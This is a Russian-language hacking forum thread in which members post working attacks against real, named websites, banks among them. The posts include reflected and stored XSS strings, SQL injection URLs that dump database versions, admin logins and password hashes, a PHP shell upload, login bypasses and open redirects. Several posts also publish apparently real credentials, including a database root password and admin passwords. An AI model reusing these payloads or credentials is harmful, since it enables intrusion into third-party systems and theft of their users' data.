это DOM based XSS
работает даже в хроме

http://www.3dnews.ru/search/#query=alert(1)&sdate=&edate=&intitle=0



страннло что у меня не работает, может хром старый?

ocheretko
02.09.2015, 15:10
↑ (https://antichat.live/posts/3886789/)
страннло что у меня не работает, может хром старый?


Введи в поиск и нажми значок поиска alert(1)

https://i.gyazo.com/f5a8ceea0731dfc1091da8154529bcca.png

Muracha
07.09.2015, 22:31
http://www.militarynews.ru/default.asp?SStr=%22%3E%3Cscript%3Ealert%28%29%3C% 2Fscript%3E

пассивно-активная XSS.

Интересно то, что если после перехода по ссылке попробовать авторизоваться, то окошко авторизации выскакивает во второй раз.

DDShadoww
08.09.2015, 10:02
Target: allbanks.ru

Type: Reflected

В поля поиска -


">alert(1)



Target: capitalbank.kz/oldsite/

Type: Reflected

В поля поиска -


">alert(1)


Target: asbank.ru/

Type: Reflected

В поля поиска -


">alert(1)

d3q
09.09.2015, 18:30
↑ (https://antichat.live/posts/3886778/)
Target: _ttp://www.edelws.ru (http://www.edelws.ru)
Type : XSS-Reflected(вбивается под поисковик .)


"<>script>alert("WH")



Видимо опечатка - второй и третий символ надо поменять местами
">alert("WH")

DDShadoww
12.09.2015, 20:53
Target: foto7an.se

Type:Reflected and Stored

Весь в XSS. И еше бонус - foto7an.se/files/

sander
15.09.2015, 07:27
Ссылкаnlinetrade.ru

Тип: Полу-активная,действует некоторое время,потом надо снова вбивать урл со скриптом .


www.onlinetrade.ru/member/login?url=%2522%253E%253Cscript%253Ealert()%253C%2 fscript%253E&c=399581">alert("WH")>

sander
15.09.2015, 07:42
Ссылка: patee.ru

Тип:XSS-Reflected


">alert("WH")

Регистрируемся,создаем рецепт

Вбиваем в "Названии блюда" "Описание блюда" скрипт и ещё в "Стадия приготовления"

Там где число пропорции пишем любое число(только не сильно большое)

"Время приготовления в минутах " так же .

Не забудьте добавить ингредиенты(!),любые на рандом(я выбирал 4 штуки) .

После отправляем и видим XSS-Reflected .

faza02
15.09.2015, 11:01
↑ (https://antichat.live/posts/3891317/)
Ссылкаnlinetrade.ru

Тип: Полу-активная,действует некоторое время,потом надо снова вбивать урл со скриптом .

www.onlinetrade.ru/member/login?url=%2522%253E%253Cscript%253Ealert()%253C%2 fscript%253E&c=399581">alert("WH")>



разберитесь с определениями.

tipa_cracker
16.09.2015, 20:22
Самый переломанный сайт --> http://vivactiv.ru/trainings/traine..._concat(login,0x3a,password),2,3+from+adm in-- (http://vivactiv.ru/trainings/trainers.php?id=4+UNION+select+group_concat(login, 0x3a,password),2,3+from+admin--)

DDShadoww
19.09.2015, 01:51
Target: alfa.com.tw

Type: XSS Reflected


http://www.alfa.com.tw/search.php?keyword=">alert(1)

А для Safari, Chrome работает iframe если будет присутствовать закрывающий тэг.

Filipp
19.09.2015, 13:03
XSS-reflected:


www.topglobus.ru/sachy/ridici/sachy-hra2.php?id=4181471&pozz=4'%22()%26%25prompt(935766)

joelblack
20.09.2015, 18:39
target: http://www.unifinbank.ru/

type: XSS Reflected

Строка поиска:


">alert('hello')

R3hab
22.09.2015, 20:07
STREIT Group - Armored Cars Manufacturer


http://www.armored-cars.com/vehicle/view_add.php?vid=-7%20/*!50000union*/%20distinct%20select%201,2,3,4,5,version(),7,8,9

ТИЦ 30

PR 3

AR 969,040

5.5.42-MariaDB-cll-lve


Make Free Bitcoin


http://www.makefreebitco.in/news.php?id=-5'%20/*!50000union*/%20distinct%20select%201,version(),3,4--+f


AR 149,492

5.5.42-37.1

Трафф 140K


SMS PARIAZ - Accueil

Joomla кому надо,добьет


http://www.smspariaz.com/race/turf2.php?mid=-7%20union%20select%201,2,version(),4,5,6,7,8,9,10, 11,12--+f


PR 2

AR 322,679

5.6.23

Трафф 120K

DDShadoww
22.09.2015, 21:42
Target:220-volt.ru

Type:XSS Reflected


www.220-volt.ru/search/?q=confirm(1)

tipa_cracker
25.09.2015, 07:34
Мне кажется что тут ( http://www.girlplays.ru/ ) уязвимости в поисковике 0 ...

ocheretko
25.09.2015, 14:27
↑ (https://antichat.live/posts/3894822/)
Мне кажется что тут (
http://www.girlplays.ru/
) уязвимости в поисковике
0
...


Так и есть.


$P$BVX.b8gaC9KdVELsexne9KZawfO70G0 | admin | rusakov1971@inbox.ru

Method: POST
Type: UNION query
Title: MySQL UNION query (random number) - 7 columns
Payload: search=-8718') UNION ALL SELECT CONCAT(0x717a707171,0x7a507250687641477a52,0x71706 26a71),1342,1342,1342,1342,1342,1342#&submit_s=



define('DB_USER', 'root');
define('DB_PASSWORD', '89039486893');
define('DB_HOST', 'localhost');

sander
29.09.2015, 09:19
Target:


_ttp://good-steam.ru/backup.zip .

.

Type:Backup .

sander
29.09.2015, 11:35
Target:salrium.ru

Type : XSS - Reflected .


salrium.ru/resp_block.php?id_goods=1728083">alert("WH")
или вот так
http://salrium.ru/resp_block.php?id_goods=1728083%27%22%28%29%26%25% 3Cacx%3E%3CScRiPt%20%3Eprompt%28908717%29%3C/ScRiPt%3E&page=2 .
Можно и так salrium.ru/resp_block.php?id_goods=">alert("WH")

sander
29.09.2015, 19:31
Target:_ttp://steam-extra.ru/listing.php?category_id=40049

Type:XSS-Reflected


">alert("WH")

или


'"()&%prompt(916773)

Или свой .

zigen
06.10.2015, 13:57
Target: http://www.archetype.co.uk/search.php

Type:XSS-Reflected


">alert("OOPS")


Но там кажется можно еще и SQLi раскрутить, ошибка по строкой поиска

AlexG
06.10.2015, 17:36
↑ (https://antichat.live/posts/3899117/)
Target:
http://www.archetype.co.uk/search.php
Type:XSS-Reflected


">alert("OOPS")


Но там кажется можно еще и SQLi раскрутить, ошибка по строкой поиска


Вы правы:

Target: archetype.co.uk

Type:SQLi error based

Exploit:


Get: http://www.archetype.co.uk/search.php
Post-data: search=123" and extractvalue(0x0a,concat(0x0a,(select concat(version(),0x3a,database(),0x3a,current_user )))) and 1="1 -- &submit.x=91&submit.y=9&status[]=Recent&status[]=Current&status[]=Forthcoming

DB-name: archetyp_db

DB-user: archetype

Version: 5.1.73-cll

P.S. Возможно есть более изящное решение, но у меня получилось так

UPD Поковыряв руками выяснилось, что пассы в мд5 и в вывод тупо не влазят (ограничение способа в 31 символ). Нашел такое решение (лимит 64 символа):


Get: http://www.archetype.co.uk/search.php
Post-data: search=123" and (select 1 from (Select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x) and 1="1 -- &submit.x=91&submit.y=9&status[]=Recent&status[]=Current&status[]=Forthcoming

ubepkr
13.10.2015, 05:57
Target: http://www.gaspforair.org

Уязвимость:SQLi


http://www.gaspforair.org/gasp/gedc/artcl-new.php?ID=115 +UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x0 0) ,(SELECT(@x)FROM(housing_user)WHERE(@x)IN(@x:=CONC AT(0x20,@x,userlevel,0x3a,username,0x3a,password,0 x3c62723e))))x),3,4,5--

Target: http://www.sequentialtart.com

Уязвимость:SQLi


http://www.sequentialtart.com/article.php?id=-445+UNION+ALL+SELECT+1,2,3,4,(SELECT(@x)FROM(SELEC T(@x:=0x00),(SELECT(@x)FROM(seqtartprod.IPM_users) WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x3a,passw ord,0x3a,email,0x3c62723e))))x),6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24--

Вот прогнал последнюю DirB'ом, удивился: http://www.sequentialtart.com/.bash_history (http://www.gaspforair.org/.bash_history) и http://www.sequentialtart.com/.mysql_history (http://www.gaspforair.org/.mysql_history)

чО уж там, /etc/shadow надо в общий доступ!)))

Добавлю:

Target: http://yrmusic.com

Уязвимость:SQLi


http://yrmusic.com/v2/artists/bios/artist.php?ID=-84+UNION+ALL+SELECT+1,(Select+export_set(5,@:=0,(s elect+count(*)from(information_schema.columns)wher e@:=export_set(5,export_set(5,@,table_name,0x3c6c6 93e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

Target: http:http://www.zam.it

Уязвимость:SQLi


http://www.zam.it/home.php?id_autore=234 +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATA BASE(),VERSION()),3,4,5,6,7,8,9,10 --

Оффтоп про вышеуказанный адрес: параллельно с Лисой (хакбар с Диосами), то ли с бодуна, то ли просто от лени, запустил Havij. Дык вот (это не первое наблюдение), он, не поверите, врет)) Не верьте Havij'у ибо он утверждает, что здесь 2 таблицы, а на самом деле, их 10)) Попробуйте последний адрес через запрос и через сию программулину))

Target: http:http://sh.newsun.dk

Уязвимость:SQLi


http://sh.newsun.dk/vis.php?id=189+UNION+ALL+SELECT+1,2,3,4,CONCAT_WS( 0x203a20,USER(),DATABASE(),VERSION()),6,7,8--

R3hab
17.10.2015, 12:36
DUS Architects Amsterdam

Type:SQLi


http://www.dusarchitects.com/news.php?newsid=-8%27%20union%20select%201,2,3,version(),5,6,7--+f

ТИЦ 20

PR 5

5.6.23-LOG

DDShadoww
22.10.2015, 01:48
Target: http://motivtelecom.ru

Type: XSS Reflected


motivtelecom.ru/sverdlovsk-oblast/search?search_text=">alert(1)

R3hab
23.10.2015, 10:19
YogaBugs

Type : SQLi


http://www.yogabugs.com/shop_item.php?id=-3%20union%20select%201,2,version(),4,5,6,7,8,9,10, 11--+f

PR 3

5.5.44-0ubuntu0.14.04.1

sander
24.10.2015, 18:12
Redirect


blagoveshchensk-amur.websender.ru/redirect.php?url=http://вашсайт/



partop.ru/redirect.php?url=http://вашсайт/

.


budennovsk.g-o-r-o-d.ru/url.php?url=http...

sander
25.10.2015, 10:55
XSS-Reflected


">alert()

Сайт : _ttp://hibiny.com/

В поисковике .

XSS-Reflected

Url:


_ttp://ntagil.rutaxi.ru/index.html?state=closedialog

Жмём "Дополнительные параметры",ищем строку "№ корп.ка" и вводим туда свой скрипт . В моём случае


">alert()

и скрипт сразу срабатывает . Вбивается под строкой "Дополнительные параметры" .

Waki
26.10.2015, 21:11
UNION query


http://www.alda-europe.eu/newSite/project_dett.php?ID=ID=-8135%20UNION%20ALL%20SELECT%205511,5511,5511,5511, 5511,5511,5511,5511,5511,5511,version(),5511,5511, 5511,5511,5511,5511,5511,5511,5511,5511,5511,5511, 5511,5511#

5.0.92-enterprise-gpl-log

тиц 30

pr 6

sander
05.11.2015, 23:11
XSS-Reflected .

Сайт:_ttp://stranasp.ru


">alert()

joelblack
06.11.2015, 01:14
target: http://www.bankmtb.ru/ (http://www.unifinbank.ru/)

type: XSS Reflected

Строка поиска:


">alert(1337)

target: http://www.transstroybank.ru

type: XSS Reflected

Строка поиска:


">alert('Hello')

private_static
06.11.2015, 23:56
Target:gismeteo.ru

Type:XSS Reflected

ТИЦ:23k


http://informer.gismeteo.ru/html/getinformer_new.php?tnumber=1&city0=4980Кишиневalert("xss")&codepg=utf-8&par=4&inflang=rus&domain=ru&vieinf=2&p=1&w=1&tblstl=gmtbl&tdttlstl=gmtdttl&tdtext=gmtdtext&new_scheme=1

sander
25.11.2015, 18:58
Ссылка : _ttp://www.golovastik.ru (http://www.golovastik.ru) .

Тип : XSS-Reflected .


">alert()

вводится в поисковике .

R3hab
29.12.2015, 10:16
VLS | Сервер деревенской жизни

SQLi


http://villagelifeserver.ru/pack.php?ID=-4%27%20union%20select%201,group_concat(ID,0x3a,UUI D,0x3a,nick,0x3a,password,0x3a,sex,0x3a,status),3, 4,5,6,7,8,9,10,11,12,13%20FROM%20users--+f

ТИЦ 10

AR 558,485

Octavian
31.12.2015, 19:30
Arbitrary file upload

http://piatalipcani.md/ro/add_anunt.php

Заливаем через картинку shell.phtml

Получяем http://piatalipcani.md/img_anunt/shell.phtml

Octavian
31.12.2015, 19:43
Phpmyadmin без пароля

http://ctice.md:8082/phpmyadmin

ФЛЕШКА )

http://maestro.md/

blackhead
04.01.2016, 13:53
http://www.dortekarrebaek.dk/newsdetail.php?id=193+union+select+1,user(),versio n(),4+--

DORTEKARREBAEK_@10.246.64.149

5.5.47-MariaDB-1~wheezy


http://www.afmec.org/admin/index.php?msg=alert("LOL")



http://www.trex.uqam.ca/index.php?action=alert("LOL")

R3hab
05.01.2016, 21:26
Meghalaya Board of School Education

SQLi


http://www.mbose.in/more.php?category=home&id=2%27%20union%20select%201,group_concat(table_na me),3,4%20FROM%20INFORMATION_SCHEMA.TABLES--+f

PR 3

AR 796,284

5.5.36-cll

ph03nix
07.01.2016, 19:37
http://websurf.ru/signup.php

Поле: Ваше имя


">alert('HakNet')

http://id.ykt.ru/page/register

Поле: Ник в сети Ykt.Ru


">alert('HakNet')

ph03nix
08.01.2016, 17:52
http://lawyerstars.ru/

Во все поля


">alert('Ph03niX')

blackhead
13.01.2016, 14:12
1. Target: courtnews.co.nz PR 3

Type: SQLi


http://courtnews.co.nz/story.php?id=-3251+UNION+SELECT+user%28%29,version%28%29,3+--

hooked_hooked@localhost

5.1.73-cll

На сайте есть блог wp, можно попробовать украсть куки через XSS


http://courtnews.co.nz/story.php?id=-3251+UNION+SELECT+1,0x3C7363726970743E616C65727428 2758585827293C2F7363726970743E,3+--


2. Target:beloboka.ru (http://beloboka.ru) ТИЦ 60

Type: SQLi


http://beloboka.ru/beloboka/index.php?mode=sections&id=-53+UNION+SELECT+1,2,3,4,user(),version()+--


beloboka@localhost

5.6.19-log

Админка http://beloboka.ru/beloboka/cp

Пароль и логин в базе. В админке есть возможность залить любой файл.

Шниперсон
31.01.2016, 21:09
Type: SQLi

http://www.banknotymira.ru/?nav=pozition&id=-6074'+union+select+1,2,3,4,5,6,7,8,9,user(),11,12, 13'-- -

http://www.banknotymira.ru/admin

admin - login

15182 - password

bkmir_u43895@localhost

nordwarrior
31.01.2016, 21:18
SQL-i


http://www.northbaybiz.com/bizResources/Press_Releases/index.php?uid=999999+union+select+1,2,3,4,5,6,conc at_ws(0x3a,user_email,user_pass),8,9,10,11,12,13,1 4,15,16,17,18,19+from+wp_users--

Filipp
09.03.2016, 23:40
XSS-reflected:


http://blog.rebz.net/wp-includes/js//swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.coo kie);//

atata
25.03.2016, 11:40
http://www.oldtown-apartments.com/index.php?cat=1 and (select 1 from (Select count(*),Concat((select user()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)&id=14

atata
25.03.2016, 18:01
http://dlib.statistics.gr/portal/pa...les?p_topic=10007369&p_cat=10007369&p_catage= (http://dlib.statistics.gr/portal/page/portal/ESYE/yeararticles?p_topic=10007369&p_cat=10007369&p_catage=)alert(123);

spize0r
07.04.2016, 02:21
http://supersleep.ru/?ITEM_ID=2776+/*!12345union*//*!12345select*/version%28%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20

5.5.43-0+deb7u1

spize0r
07.04.2016, 02:34
http://www.dutchaero.nl/index.php?catid=13+/*!12345union*//*!12345select*/version%28%29,2,3,4,5,6

sander
07.04.2016, 16:45
_ttp://www.artrussia.ru/artists/artist_s.php?id=999999.9 (http://www.artrussia.ru/artists/artist_s.php?id=999999.9)' union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16 and '0'='0

Егорыч+++
07.04.2016, 16:51
↑ (https://antichat.live/posts/3971239/)
_ttp://www.artrussia.ru/artists/artist_s.php?id=999999.9 (http://www.artrussia.ru/artists/artist_s.php?id=999999.9)
' union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16 and '0'='0


этот сайт как пособие везде используется, так что не пойдет

spize0r
14.04.2016, 19:54
http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,version%28%29,3,4,5,version%28% 29,7--+-

5.0.83


http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,database%28%29,3,4,5,version%28 %29,7--+-

teamboad


http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,user%28%29,3,4,5,version%28%29, 7--+-

teamboad@172.20.245.62

Егорыч+++
14.04.2016, 21:32
↑ (https://antichat.live/posts/3973713/)

http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,version%28%29,3,4,5,version%28% 29,7--+-

5.0.83

http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,database%28%29,3,4,5,version%28 %29,7--+-

teamboad

http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,user%28%29,3,4,5,version%28%29, 7--+-

teamboad@172.20.245.62


уже заезжанный сайт

kingbeef
15.04.2016, 15:29
↑ (https://antichat.live/posts/3971239/)
_ttp://www.artrussia.ru/artists/artist_s.php?id=999999.9 (http://www.artrussia.ru/artists/artist_s.php?id=999999.9)
' union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16 and '0'='0


Может запретить такие ссылки?

Тема вроде для публикация лично найдены уязвимостей, а [t] подставляет софт.

Человек закинул ссылки в программу и она кучей их проверяет.

При публикации даже [t] не убирают.

pw0ned
15.04.2016, 16:15
https://site.ua/search/?searchStrin...al(name)+background=javascript:eval (name)//>" (https://site.ua/search/?searchString=javascript%3A%2F*--%3E%3C%2Fmarquee%3E%3C%2Fscript%3E%3C%2Ftitle%3E%3 C%2Ftextarea%3E%3C%2Fnoscript%3E%3C%2Fstyle%3E%3C% 2Fxmp%3E%22%3E[img%3D1]%3Cimg+-%2Fstyle%3D-%3Dexpression%26%2340%26%2347%3B%26%2342%3B%E2%80% 99%2F-%2F*%26%2339%3B%2C%2F**%2Feval%28name%29%2F%2F%26% 2341%3B%3Bwidth%3A100%25%3Bheight%3A100%25%3Bposit ion%3Aabsolute%3Bbehavior%3Aurl%28%23default%23VML %29%3B-o-link%3Ajavascript%3Aeval%28title%29%3B-o-link-source%3Acurrent+name%3Dalert%281%29+onerror%3Deva l%28name%29+src%3D1+autofocus+onfocus%3Deval%28nam e%29+onclick%3Deval%28name%29+onmouseover%3Deval%2 8name%29+background%3Djavascript%3Aeval%28name%29% 2F%2F%3E%22)

kingbeef
15.04.2016, 21:11
↑ (https://antichat.live/posts/3974092/)
https://site.ua/search/?searchString=javascript:/*-->">[img=1]" (https://site.ua/search/?searchString=javascript%3A%2F*--%3E%3C%2Fmarquee%3E%3C%2Fscript%3E%3C%2Ftitle%3E%3 C%2Ftextarea%3E%3C%2Fnoscript%3E%3C%2Fstyle%3E%3C% 2Fxmp%3E%22%3E[img%3D1]%3Cimg+-%2Fstyle%3D-%3Dexpression%26%2340%26%2347%3B%26%2342%3B%E2%80% 99%2F-%2F*%26%2339%3B%2C%2F**%2Feval%28name%29%2F%2F%26% 2341%3B%3Bwidth%3A100%25%3Bheight%3A100%25%3Bposit ion%3Aabsolute%3Bbehavior%3Aurl%28%23default%23VML %29%3B-o-link%3Ajavascript%3Aeval%28title%29%3B-o-link-source%3Acurrent+name%3Dalert%281%29+onerror%3Deva l%28name%29+src%3D1+autofocus+onfocus%3Deval%28nam e%29+onclick%3Deval%28name%29+onmouseover%3Deval%2 8name%29+background%3Djavascript%3Aeval%28name%29% 2F%2F%3E%22)


Там вроде и фильтров нету...

pw0ned
15.04.2016, 21:14
↑ (https://antichat.live/posts/3974216/)
Там вроде и фильтров нету...


alert()

фильтрует

kingbeef
15.04.2016, 22:26
↑ (https://antichat.live/posts/3974219/)
alert()
фильтрует


https://site.ua/search/?searchString=alert() (https://site.ua/search/?searchString=%3C/title%3E%3Cscript%3Ealert%28%29%3C/script%3E)

Не фильтрует

Octavian
19.04.2016, 20:57
http://vic.md/ro/notebook/list/all/...VERSION(),225,26,27,28,29,30,31,32+AND+(1)=(1 (http://vic.md/ro/notebook/list/all/1/producator_ID=9999)+UNION+SELECT+1,2,3,4,5,6,7,8,9 ,10,11,12,13,USER(),15,16,17,18,19,20,21,22,23,VER SION(),225,26,27,28,29,30,31,32+AND+(1)=(1)

Дальше не смог вывести пользователеи.В ЛС кто сделает это )

BabaDook
19.04.2016, 22:06
http://vic.md/ro/notebook/list/all/1/producator_ID=9999)+and (select 1 from (Select count(*),Concat((select table_name from infor mation_schema.tables where table_schema=database () limit 81,1),0x3a,floor(rand(0)*2))y from in formation_schema.tables group by y ) x)+AND +(1)=(1 #


AND+(1)=(1 это не нужно. Просто 9999 без )

sander
18.08.2016, 12:30
http://takky-shop.ru/images/img/log.txt

Открытый лог .

Reflected XSS


http://takky-shop.ru/category/">alert()



http://takky-shop.ru/search

в поисковике тоже XSS .

waydam
22.08.2016, 19:16
10minutemail.com

XSS

Еще интересная особенность, письмо дублируется много раз и каждый раз выскакивает алерт, не знаю с чем это связано)

BabaDook
23.08.2016, 02:26
Да эти ХСС даже уязвимостью назвать нельзя

https://www.crazymailing.com хсс

SooLFaa
22.09.2016, 10:56
Солью не столь давний ресерч дабы разбавить скульки да хсски. Как отправлять бесплатно открытки на сервисе voicecards.ru?

Логическая уязвимость на сервисе voicecard.ru, позволяет отправлять бесплатно голосовые открытки.

Баг находился в сервисе бонус кодов, то есть бонус код является номером. И при авторизации не через телефон, можно спокойно запустить JQuery скрипт, который с легкостью подберет его за секунды и отправит смс (в дальнейшем его приведу). Теперь детально:

Первое, авторизовываемся не через телефон, а средствами забытого пароля:

http://s011.radikal.ru/i315/1609/c6/28939a6c873c.png

Вызываем форму отправки бонус кода, чтобы вызвать нужную нам форму для подбора.

http://s008.radikal.ru/i304/1609/4b/7adf49899ecc.png

Далее тупо перебираем скриптом в консоле

[CODE]
for (var i = 800000; i

BabaDook
25.10.2016, 21:30
http://newipnow.com/

в ПОЛЕ URL В ВОДИМ 127.0.0.1:3306

S.S.R.F.

Octavian
29.11.2016, 17:17
http://new-semkino.ru/cp/login

http://rio-holding.ru/cp/login

http://stzem.ru/cp/login

http://buro.moscow/cp/login

http://rek-on.ru/cp/login

http://kolomnalnd.ru/cp/login

http://vodny-2.ru/cp/login

http://kutuzovo.club/cp/login

http://2112211.ru/cp/login

http://serveing.ru/cp/login

http://svus.ru/cp/login/

http://galilei-house.ru/cp/login

http://www.smartlab.ru/cp/login

http://l-vm.ru/cp/login

http://gavangroup.ru/cp/login

http://an-megapolis.ru/cp/login

В Логине " or 1=1 --

pw0ned
29.11.2016, 20:51
http://image.prntscr.com/image/d4458b80ae514659a869ceb7880079c1.png

http://golden-bird.biz/signup


login=">alert(/xss/)&email=1@email.com&pass=password&repass=password

MrFear41
12.12.2016, 16:17
Exploit :

Boolean Based SQL Injection


http://villagelifeserver.ru/contest.php?ID=' OR 'ns'='ns

SeytaR
04.02.2017, 15:13
Обход WAF (Mod_Security)

http://www.slightergolf.com/products/shop.php?c=misc&id=-8 /*!12345union*//*!12345select*/1,2,3,4,user(),6,7,8,9,10,11--+

USER():slighter_sgAdmin@localhos

http://www.slightergolf.com/products/shop.php?c=misc&id=-8 /*!12345union*//*!12345select*/1,2,3,4,/*!CONVERT*/(/*!12345GrOuP_CoNcAT(name,0x3a,password)*/ USING latin1),6,7,8,9,10,11 /*!12345from*/ admins--+

Name:misty,slighter,sgadmin


Password:svD1A0JC5ggN,C4XTZLtTlTUg,C4XTZLtTlTUg

SeytaR
04.02.2017, 15:26
SQL injec.

Scott County CDA


http://www.scottcda.org/page.php?id=-16 union select 1,group_concat(email,0x3a,password),3,4,5,6 from admin--+

pw0ned
04.02.2017, 20:15
http://www.nhlegendsofhockey.com/news.php?id=-65+union+select+all+1,2,3,4,5,6,7,8,9,10

SeytaR
05.02.2017, 17:40
SQL INJECTIONProviding Turnkey Solutions To Automotive Industry

http://www.nashgroup.co.in/about.php?catid=-5 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4,5,6,7,8,9--+

nashgrou_user@localhost : nashgrou_dbnew : 5.5.52-cll

http://www.nashgroup.co.in/about.php?catid=-5 union select 1,concat(username,0x3a,userpass),3,4,5,6,7,8,9 from tbladmin--+

orangedc:XCIJIlczVnYEIFAxAG8MPQ==

SeytaR
05.02.2017, 21:01
SQL INJECTION DRONES LAB

https://www.drones-lab.com/blog/post.php?id=-24 union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),ver sion()),4,5,6,7,8,9--+&titre=Drones-lab-est-le-er-centre-de-formation-agree-par-lOSAC#.WJizCdKLTIX


droneslab@localhost : droneslab_website : 10.1.18-MariaDB

USER_PRIVILEGES:droneslab'@'localhost' -> NO

pw0ned
09.02.2017, 14:45
Firefox


http://top.zhyk.ru/search?rate=0%22%3E%3Cimg%20src=x%20onerror=alert( document.domain)%3E&chronic=0&filter=%D0%9F%D0%BE%D0%B4%D0%BE%D0%B1%D1%80%D0%B0% D1%82%D1%8C+%D1%81%D0%B5%D1%80%D0%B2%D0%B5%D1%80

http://image.prntscr.com/image/1d5818eb11eb45e1abed87f9e93c695f.png

leksadin
10.02.2017, 04:53
Blind SQL injection

agroharvest.ru/index.php?route=product/product&path=336_343&product_id=21448' AND substring(VERSION(),1,6)='5.6.32

В случае, когда равенство не выполняется, на сайте пропадают рекомендуемые товары.

Данный параметр 17 раз напрямую попадает в код страницы - можно было бы сделать SiXSS. Но при попытке сразу после угловой скобки () весь остальной текст удаляется.

sander
16.02.2017, 12:07
http://takky-shop.ru/images/img/log.txt

LOG .

SooLFaa
19.02.2017, 00:44
↑ (https://antichat.live/posts/4047322/)
Blind SQL injection
agroharvest.ru/index.php?route=product/product&path=336_343&product_id=21448' AND substring(VERSION(),1,6)='5.6.32
В случае, когда равенство не выполняется, на сайте пропадают рекомендуемые товары.
Данный параметр 17 раз напрямую попадает в код страницы - можно было бы сделать SiXSS. Но при попытке сразу после угловой скобки () весь остальной текст удаляется.


Тогда это не блайнд, если результат запроса выводится на станицу. А если сам параметр на странице то это уже не SiXSS а обычная отраженка. Но это просто термины. А так почёт и уважение.....